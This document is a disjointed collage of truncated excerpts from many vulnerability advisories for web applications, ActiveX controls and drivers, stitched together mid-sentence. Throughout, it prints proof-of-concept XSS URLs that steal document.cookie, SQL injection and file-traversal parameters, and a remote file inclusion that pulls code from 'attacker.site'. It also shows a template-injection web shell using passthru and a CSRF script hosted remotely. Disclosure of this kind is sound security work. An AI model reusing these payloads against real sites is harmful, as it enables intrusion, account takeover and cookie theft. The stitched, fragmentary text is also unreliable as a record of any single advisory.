Credit: High-Tech Bridge SA Security Research Lab ( https://www.htbridge.ch/advisory/ )
Vulnerability Details:
High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in SiT! Support Incident Tracker, which can be exploited to perform SQL injection, cross-site scripting and cross-site request forgery attacks.
1) Input passed via the "start" GET parameter to /portal/kb.php is not properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
The following PoC code is available:
http://[host]/portal/kb.php?start=SQL_CODE_HERE
Multiple vulnerabilities have been discovered in OpenX, which can be
exploited by malicious people to conduct cross-site scripting,
cross-site request forgery, and file inclusion attacks and by
malicious users to conduct script insertion and SQL injection attacks.
1) Input passed to the "clientid" parameter in "www/admin/banner-acl.php", "www/admin/banner-edit.php", "www/admin/campaign-zone.php", "www/admin/advertiser-campaigns.php", "www/admin/campaign-banners.php", and "www/admin/banner-activate.php" is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in
High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in osCmax, which can be exploited to perform SQL Injection and Cross-Site Scripting (XSS) attacks.
1) Multiple Cross-Site Scripting (XSS) in osCmax: CVE-2012-1664
1.1 Input passed via the "username" POST parameter to /admin/login.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in the context of the affected website.
The following PoC (Proof of Concept) demonstrates the vulnerability:
which can be exploited by malicious users to manipulate certain data,
conduct spoofing, SQL injection, and script insertion attacks and by
malicious people to conduct SQL injection and script insertion
attacks.
1) Input passed via the "login" parameter to index.php is not properly
sanitised before being used in an SQL query. This can be exploited to
manipulate SQL queries by injecting arbitrary SQL code.
2) Input passed via the "login" and "password" parameters to index.php
is not properly sanitised before being displayed to the user. This can
Credit: High-Tech Bridge SA Security Research Lab ( https://www.htbridge.ch/advisory/ )
Vulnerability Details:
High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in OBM, which can be exploited to perform information disclosure, cross-site scripting, local file inclusion and SQL injection attacks.
1) Input passed via the "module" GET parameter to /exportcsv/exportcsv_index.php is not properly verified before being used to include files.
This can be exploited to include local files via directory traversal sequences.
The following PoC is available:
http://[host]/exportcsv/exportcsv_index.php?action=export_page&module=../../../../tmp/file
15. $templateContent = $_POST['templateContent'];
16. if(file_exists($filename) === false) {
17. $ok = file_put_contents($filename, $templateContent);
18. chmod($filename, 0644);
Input passed through $_POST['templateName'] and $_POST['templateContent'] isn't sanitized before being used in a call to file_put_contents() at line 17. This can be exploited to write arbitrary PHP code into a file with a .php extension, even if magic_quotes_gpc = on. Proof of concept request:
POST /efront/www/editor/tiny_mce/plugins/save_template/save_template.php HTTP/1.1
Host: localhost
---------------
SUPERAntiSpyware and Super Ad Blocker have almost identical device
drivers in order to set up hooks and perform other duties from kernel
space. These device drivers suffer from lack of validation of
parameters passed from user mode. Additionally, some of the functions
accessible from user mode are inherently insecure and lead to easy
privilege escalation. All vulnerabilities are applicable to both
applications.
Analysis and code were developed for SUPERAntiSpyware v4.33.1000, but
http://[host]/phpshop/admpanel/menu/adm_menu_new.php/%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://[host]/gbook/?a=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
Successful exploitation of these vulnerabilities requires that Apache's directive "AcceptPathInfo" is set to "on" or "default" (the default value is "default").
2) Input passed via the "pid" GET parameter to /phpshop/admpanel/catalog/admin_cat_content.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in the context of the affected website.
The following PoC code is available:
http://[host]/phpshop/admpanel/catalog/admin_cat_content.php?pid=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
Credit: High-Tech Bridge SA Security Research Lab ( https://www.htbridge.ch/advisory/ )
Vulnerability Details:
High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in Efront, which can be exploited to perform SQL injection and cross-site scripting attacks.
1) Input passed via the "course" GET parameter to index.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in the context of the affected website.
The following PoC code is available:
http://[host]/index.php?ctg=lesson_info&lessons_ID=1&course=%27%20onmouseover%3dalert%28document.cookie%29%3E
470 | # Then overwrite with POST
471 | self::$request = IPSLib::parseIncomingRecursively( $_POST, $input );
... |
The init() function cleans the input data passed via methods like GET, POST or others at the start of each request to the forum, before any of the input variables are processed.
Let's look into sanitization performed by cleanGlobals function:
Title: Invision Power Board <= 2.3.5
Multiple Vulnerabilities and Security Bypass
Vendor: http://www.invisionpower.com/community/board/
Advisory: http://acid-root.new.fr/?0:18
Author: DarkFig < gmdarkfig (at) gmail (dot) com >
Released on: 2008/08/29
Changelog: 2008/08/29
iPrint Client, which can be exploited by malicious people to
compromise a user's system.
1) A boundary error in the Novell iPrint ActiveX control (ienipp.ocx)
when handling the "GetDriverFile()" method can be exploited to cause a
stack-based buffer overflow by passing an overly long string as the
third argument.
2) Two boundary errors in the Novell iPrint ActiveX control
(ienipp.ocx) when constructing a URI based on input to the
"GetPrinterURLList()" and "GetPrinterURLList2()" methods can be
...
The 'forum' variable is taken from the $_POST[] array and inserted in an SQL query without prior sanitization and without being surrounded by quotes.
Then you can subsequently manipulate this query in /modules/forum/class/class.permissions.php by passing another 'UNION SELECT' as the first argument of the 'UNION SELECT' passed to post.php
(a little bit complex, huh? $forum_id is user controlled ...)
100-102:
...
High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in Newscoop, which can be exploited to perform Remote File Inclusion, SQL Injection and Cross-Site Scripting (XSS) attacks.
1) Multiple Remote File Inclusion in Newscoop: CVE-2012-1933
1.1 Input passed via the "GLOBALS[g_campsiteDir]" GET parameter to /include/phorum_load.php is not properly verified before being used in require_once() function and can be exploited to include arbitrary remote files.
The following PoC (Proof of Concept) demonstrates the vulnerability:
http://[host]/include/phorum_load.php?GLOBALS[g_campsiteDir]=http://attacker.site/file%00
Credit: High-Tech Bridge SA Security Research Lab ( http://www.htbridge.ch/advisory/ )
Vulnerability Details:
High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in Open-Realty, which can be exploited to perform cross-site scripting and SQL Injection attacks.
1) Input passed via the "name", "email", "friend_email", "subject", "message" POST parameters to index.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in the context of the affected website.
The following PoC code is available:
http://[host]/modules/admin/admin_module_index.php/%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://[host]/modules/calendar/customise_calendar_times.php/%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
Successful exploitation of these vulnerabilities requires that Apache's directive "AcceptPathInfo" is set to "on" or "default" (the default value is "default").
2) Input passed via the "login[]" POST parameters to index.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in the context of the affected website.
The following PoC code is available:
Conditions for exploitation:
=> PHP needs to be used via CGI or FastCGI.
=> The system must be set up to use suexec (rather than, say, having PHP run as an external FastCGI server).
=> The attacker must be able to run code as the same user that the webserver runs as. This is unlikely to be a problem for many local attackers, because there are a multitude of possible attack vectors, such as SSI, non-suexec CGI scripts, non-suexec PHP (if mod_php is also installed), and likely numerous other options.
=> Depending on the configuration, setting an open_basedir might protect an installation. However, this only applies if open_basedir is set, php-cgi is not installed directly into the web space, but is instead called from a script which doesn't pass any parameters from the script command line.
Affected PHP versions:
=> All versions of PHP (including PHP 5.2.8 and latest CVS) in existence at the date of this advisory are believed to be affected.
Vendor notification:
* This program is meant to be used in controlled environments only.
* If found in the wild, please return to ... wait, this is public now,
* and this program is hereby placed in the public domain. Feel free to
* reuse parts of the source code, etc.
*
* Password hashes will be dumped to stdout as they're being obtained.
* There may be duplicates.
*
* Debugging may be enabled with one to three "-d" flags. Debugging
* information will be dumped to stderr and, for levels 2 and 3, to
* the "dump" file.
Credit: High-Tech Bridge SA Security Research Lab ( https://www.htbridge.ch/advisory/ )
Vulnerability Details:
High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in Help Desk Software, which can be exploited to perform SQL injection, cross-site scripting and cross-site request forgery attacks.
1) Input passed via the user POST parameter to index.php is not properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
The following PoC code is available:
If you can log on to the server successfully,
take the following steps to create folders outside the SFTP root directory:
1. $ssh2 = Net::SSH2->new();
2. $ssh2->connect($server, $port);
3. $ssh2->auth_password($user, $pass);
4. $sftp = $ssh2->sftp();
5. $m = $sftp->mkdir("..\\A\\");
6. $ssh2->disconnect();
take the following steps to create folders outside the FTP root directory:
Credit: High-Tech Bridge SA Security Research Lab ( http://www.htbridge.ch/advisory/ )
Vulnerability Details:
High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in N-13 News, which can be exploited to perform cross-site scripting attacks.
1) Input passed via the GET "id" parameter to index.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in the context of the affected website.
The following PoC code is available:
http://[host]/index.php?id=%3C/script%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
$display .= COM_refresh ($_CONF['site_url']
. '/usersettings.php?mode=preferences&msg=6');
break;
...
All the $_POST[] variables are passed to the savepreferences() function.
Now look at the function, also in usersettings.php:
...
function savepreferences($A) {
global $_CONF, $_TABLES, $_USER;
site: http://retrogod.altervista.org/
software site: http://www.bitweaver.org/
You need a user account, and you need to change your "display name" to:
{php}passthru($_SERVER[HTTP_CMD]);{/php}
Register and click on Preferences, look at the "User Information" tab, inside the
"Real name" text field write the code above, then click on Change.
Google dorks:
The 'PathName' parameter is converted from a multi-byte string to a wide character string after verifying that it doesn't contain the dot-dot substring (the two-byte sequence 0x2e 0x2e, i.e. the ASCII substring '..') that may allow a malicious user to break out of the shared folder using a path traversal attack. The resulting wide character string converted from 'PathName' is then passed to the file system API on the Host system.
The conversion is performed using the 'MultiByteToWideChar' function from
the Windows API [5] which maps a character string provided as input to a
wide (Unicode UTF-16) character string.
Credit: High-Tech Bridge SA Security Research Lab ( https://www.htbridge.ch/advisory/ )
Vulnerability Details:
High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in Pretty Link WordPress Plugin, which can be exploited to perform cross-site scripting attacks.
1) Input passed via the "min_date" GET parameter to /wp-content/plugins/pretty-link/classes/views/prli-clicks/head.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in the context of the affected website.
The following PoC code is available:
http://[host]/wp-content/plugins/pretty-link/classes/views/prli-clicks/head.php?min_date=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
Credit: High-Tech Bridge SA Security Research Lab ( http://www.htbridge.ch/advisory/ )
Vulnerability Details:
High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in miniblog, which can be exploited to perform cross-site scripting and cross-site request forgery attacks.
1) Input passed via the GET "post_list" parameter to /adm/list.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in the context of the affected website.
The following PoC code is available:
http://[host]/adm/list.php?post_list=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
#
# AmnPardaz Security Research Team
#
# Title: Bloofox CMS Vulnerabilities
# Vendor: http://www.bloofox.com
# Bugs: SQL Injection (Authentication bypass) , Source code disclosure
# Vulnerable Version: 0.3 (prior versions also may be affected)
# Exploitation: Remote with browser
# Fix Available: No!
################################################################
Secunia Research has discovered multiple vulnerabilities in the
BookLibrary component for Joomla, which can be exploited by malicious
people to conduct SQL injection attacks.
1) Input passed via the "bid[]" parameter to index.php (when "option"
is set to "com_booklibrary" and "task" is set to "lend_request") is
not properly sanitised before being used in a SQL query. This can be
exploited to manipulate SQL queries by injecting arbitrary SQL code.
2) Input passed via the "bid[]" parameter to index.php (when "option"
src=http://somewhere/test.js></script>
content of http://somewhere/test.js
/*
Set the desired user, pass, email and victim's URL, then upload the script
somewhere on the web
*/
window.onload = function() {
var url = 'http://localhost/MamboV4.6.2/administrator/index2.php';
on a fresh test install of Plesk 8.6.0 both on OpenSUSE 10.3 x86_64 and
using psa autoinstaller.
(1) If SHORTNAMES=1 is active for smtp_psa or smtps_psa in xinetd, QMAIL
will accept ANY correctly base64 encoded username which begins with a
valid shortname or equals a valid password during AUTH LOGIN
authentication. This is only fixed by completely removing SHORTNAMES=1
from smtp(s)_psa, simply setting it to 0 has no effect.
Steps to reproduce: